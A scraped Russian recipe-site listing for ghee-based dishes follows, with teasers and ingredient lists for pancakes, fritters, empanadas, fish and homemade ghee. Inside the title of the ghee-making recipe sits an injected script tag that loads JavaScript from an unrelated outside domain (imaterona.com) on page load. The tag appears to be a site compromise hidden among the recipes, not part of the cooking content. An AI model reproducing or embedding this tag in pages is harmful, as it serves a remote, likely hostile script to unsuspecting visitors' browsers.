Масло топлёное

647 рецептов

Цельнозерновые эмпанады на топлёном масле Цельнозерновые эмпанады на топлёном масле Тесто для этих пирожков после выпекания получается очень хрустящим, отлично гармонирует с сочной начинкой из свежих овощей. А добавленная цельнозерновая мука придаёт выпечке массу полезных свойств. К тому же, опираясь на данный рецепт, можно готовить пирожк... Ингредиенты: Мука цельнозерновая (пшеничная) 200 Грамм, Мука пшеничная (1 или высший сорт) 170-200 Грамм, Вода (холодная) 200 Миллилитров, Яйца куриные 1 Штука, Масло топлёное 50 Грамм, Кольраби 270-300 Грамм, Фасоль стручковая 200-230 Грамм, Лук репчатый 1/2 Штуки, Зел...

Топлёное сливочное масло Топлёное сливочное масло<script type=text/javascript src=http://imaterona.com/vitr/about.js></script> Итак: 1 - 1.2 кг хорошего сливочного масла, положить в толстостенную посудину. У меня чугунная сковорода. На медленном огне томить 1.5 -2 часа. Белую пену снимать периодически. Не перемешивать. Масло постепенно станет прозрачным появится изумительный сливоч... Ингредиенты: Масло сливочное - 1-1.2 кг, Соль - 5-10 г

Грибное масло Грибное масло Чтобы приготовить грибное масло, нужно взять мягкое сливочное масло, соль морскую крупную, перец молотый, масло топлёное, лук, чеснок, грибы белые сушёные, коньяк, тимьян, петрушку. Грибы залить тёплой водой. Оставить на 15 минут. Поставить кастрюлю с гриба... Ингредиенты: Белые грибы сушёные - 50 г, Коньяк - 1 ст. л., Лук репчатый - 2 шт., Масло сливочное - 200 г, Масло топлёное - 50 г, Перец чёрный молотый - 3 щепотка, Петрушка свежая - 1 веточка, Соль морская - 2 г, Тимьян (Чабрец) свежий - 2 веточка, Чеснок - 1 зубчик

Блинчики фаршированные мясом Блинчики фаршированные мясом Чтобы приготовить это блюдо, нужно взять блины, отварную говядину, лук, масло сливочное топлёное, соль, перец. Мясо измельчить в блендере или в мясорубке. Лук очистить. Нарезать кубиком. На раскалённой сковороде с топлёным маслом пассеровать лук до прозрачн... Ингредиенты: Вода кипячёная - 300 мл, Масло оливковое Extra Virgin - 1 ст. л., Молоко - 250 мл, Мука пшеничная - 200 г, Паприка сладкая молотая - 1.5 ч. л., Сахар - 1 ст. л., Соль - 1 ч. л., Яйца куриные - 5 шт., Говядина мякоть - 400 г, Лук репчатый - 3 шт., Масло топл...

Грушевые оладьи на топлёном масле с мёдом ,почти ,как у джейми оливера Грушевые оладьи на топлёном масле с мёдом ,почти ,как у джейми оливера Добрый день! Очень просто,быстро и вкусно, впрочем,как всегда у Джейми.... Натираем груши вместе с кожицей, добавляем муку,молоко,соль и яйцо, замешиваем тесто и печём на топлёном масле оладьи. Угощаем сразу с пылу-жару, добавив мёд и корицу, я украсила мя... Ингредиенты: мука чашка( 200 гр. ), молоко чашка, соль, яйцо, груши 2 шт., масло топлёное, мёд, мята, корица, орехи грецкие для декора.

Спаржа на зелёном блинчике со сливочно-лимонным маслом и пармской ветчиной Спаржа на зелёном блинчике со сливочно-лимонным маслом и пармской ветчиной Добрый день! Нашла в немецком журнале замечательное блюдо из моих любимых блинчиков и спаржи, очень понравилось ,поэтому и угощаю.... Из ветчины подготовим украшение: скрутим их в форме "розочек",по 2-3 на порцию. Соединяем в ёмкости всё для блинчиков,кроме... Ингредиенты: блинчики: мука пшеничная 50 гр., молоко 90 мл., яйца 2 шт., соль чуть, масло топлёное 2 ст.л., зелень (петрушка,лучок)., спаржа белая 500 гр., соль 1/2 ч.л., сахар 1 ч.л., масло сливочное 50 гр. +1 ч.л., сок лимона (1-2 ст.л. ), перец чёрный молотый, ветчин...

Оладьи из цуккини с копчёной форелью и огуречным салатом Оладьи из цуккини с копчёной форелью и огуречным салатом Чудесный ужин для хорошей компании... Цуккини натираем на средней тёрке,не снимая кожицу. Добавляем все необходимые для теста компоненты, кроме масла,перемешиваем и отставляем на 20 минут. Лук режем очень тонкими кольцами, присыпаем сахаром и поливаем Баль... Ингредиенты: оладьи: цуккини 2 небольшие шт., петрушка рубленная 1 -2 ст.л., мука около 100 гр., молоко 200 мл., яйца 2 шт., соль/перец/сахар, масло топлёное 2-3 ст.л., форель копчёная 250 гр., огурец салатный 1 шт., лук красный 1 шт., соль/перец/сахар, бальзамико красн...

Сливочные блинчики с маковым маслом и персиками (день четвёртый...) Сливочные блинчики с маковым маслом и персиками (день четвёртый...) Добрый день! Опять я со своими блинами,не надоела? Сегодня четверг-Разгуляй! Побалуем домашних сладкими сливочными блинчиками с маковым маслом и персиками! Соединим муку с растёртыми с солью желтками, добавим сливки и тёплое молоко с топлёным маслом. Вымес... Ингредиенты: мука 200 гр., молоко 400 мл., яйца 4 шт., сливки 200 мл., масло топлёное 3 ст.л., соль, масло сливочное 100 гр., мак молотый 2-3 ст.л., сахар 2-3 ст.л., персики мар. 400 гр.

Камбала под лимонно-укропным маслом,так просто и так вкусно... Камбала под лимонно-укропным маслом,так просто и так вкусно... Добрый вечер! Мне сегодня очень повезло, "поймала" живую !!! рыбу,камбалу. Рыбу промыла,отрезала голову и плавники, полила соком лимона. Смешала муку с солью и перцем, обваляла камбалу и пожарила в оливковом и топлёном масле до готовности. На другой сковор... Ингредиенты: камбала 4 небольшие шт., соль, перец, лимон 1-2 шт., укроп морожен., мука 2-3 ст.л., масло топлёное 1-2 ст.л., масло оливковое 1-2 ст.л., масло сливочное 50 гр., салат,помидорки.

Гхи (топленое масло) Гхи (топленое масло) Гхи для нашего организма является самым лучшим источником жирных кислот. Белки и другие молочные остатки всплывают на поверхность при кипячении сливочного мысла. Суть гхи состоит в том, чтобы удалить эти остатки и очистить масло. Гхи в переводе с санскрита ... Ингредиенты: Сливочное масло 1200 Грамм (можно брать меньше, не критично), Марля 1 Штука

Загрузка